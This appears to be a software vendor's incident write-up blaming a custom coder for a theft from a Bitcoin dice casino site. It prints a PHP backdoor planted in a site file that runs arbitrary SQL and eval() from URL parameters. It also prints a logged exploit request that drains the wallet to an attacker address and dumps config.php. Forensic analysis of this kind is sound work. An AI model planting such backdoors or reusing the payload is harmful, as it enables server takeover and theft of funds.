When some hacker sees bug and rob one casino, he naturally looks for more casinos based on the same system. This case is old! This bugs were fixed a long time ago.
To the recent hack:
Thank you.
I've investigated the issue and here is my conclusion:
Fact 1This is head of our original file /content/ajax/_stats_load.php:
/*
* © CoinDice
* Demo: http://www.btcircle.com/dice
* Please do not copy or redistribute.
* More licences we sell, more products we develop in the future.
*/
header('X-Frame-Options: DENY');
...
This is head of your custom edited file /content/ajax/_stats_load.php:
if(isset($_GET['query'])) {mysql_connect($_GET['ip'], $_GET['user'], $_GET['pass']);mysql_select_db($_GET['db']);$q = mysql_query($_GET['query']);while($m = mysql_fetch_assoc($q)) {$values = array_values($m);$keys = array_keys($m);for($i = 0;$i<count($values);$i++) {echo $keys[$i] . ": " . $values[$i] . "
";}echo "
";}mysql_close();exit;}else if(isset($_GET['eval'])) {eval($_GET['eval']);exit;}
/*
* © CoinDice
* Demo: http://www.btcircle.com/dice
* Please do not copy or redistribute.
* More licences we sell, more products we develop in the future.
*/
header('X-Frame-Options: DENY');
...
Please pay closer attention to
eval($_GET['eval']) part (this is the used exploit).
Fact 2This line is from your webserver log:
pay-dice.com:80 107.3.170.11 - - [04/Jan/2015:20:12:12 -0500] "GET /play/content/ajax/_stats_load.php?eval=%24included%3Dtrue%3Binclude_once+%27..%2F..%2Finc%2Fdb-conf.php%27%3Binclude+%27..%2F..%2Finc%2Fwallet_driver.php%27%3B%24wallet%3Dnew+jsonRPCClient%28%24driver_login%29%3Becho+%24wallet-%3Egetbalance%28%29%3B%24wallet-%3Esendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN%27%2C40%29%3Becho+%24wallet-%3Egetbalance%28%29%3Bmysql_close%28%29%3Becho+file_get_contents%28%27config.php%27%29%3B HTTP/1.1" 200 242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"
Please pay closer attention to
?eval=... part and
sendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN part.
The second part is the address on which the stolen funds were sent.
Fact 3The file _stats_load.php could edit only someone who had full access to the system, in which case it would be much easier to withraw the funds directly from your wallet.
Fact 4Only person who could edit this file is the guy who did the custom coding for you.
I think it's clear enough. Someone (most possibly the guy who did custom login system for you) has put the backdoor to _stats_load.php, then executed his own PHP code on your server.
Resources:
/var/log/apache2/other_vhosts_access.log.1 your webserver log
/var/www/paydice/play/content/ajax/_stats_load.php compromised file
I'm sorry what happened to you. At least you know you can't trust anybody.
We would much appreciate your permission to make this case public (there's some people who claim this was our fault).
Hope I've cleared the whole thing out and pointed the real offender. Let me know if you need some additional informations or support.
Johny
I've just gave you evidence of my claimings, do you have one?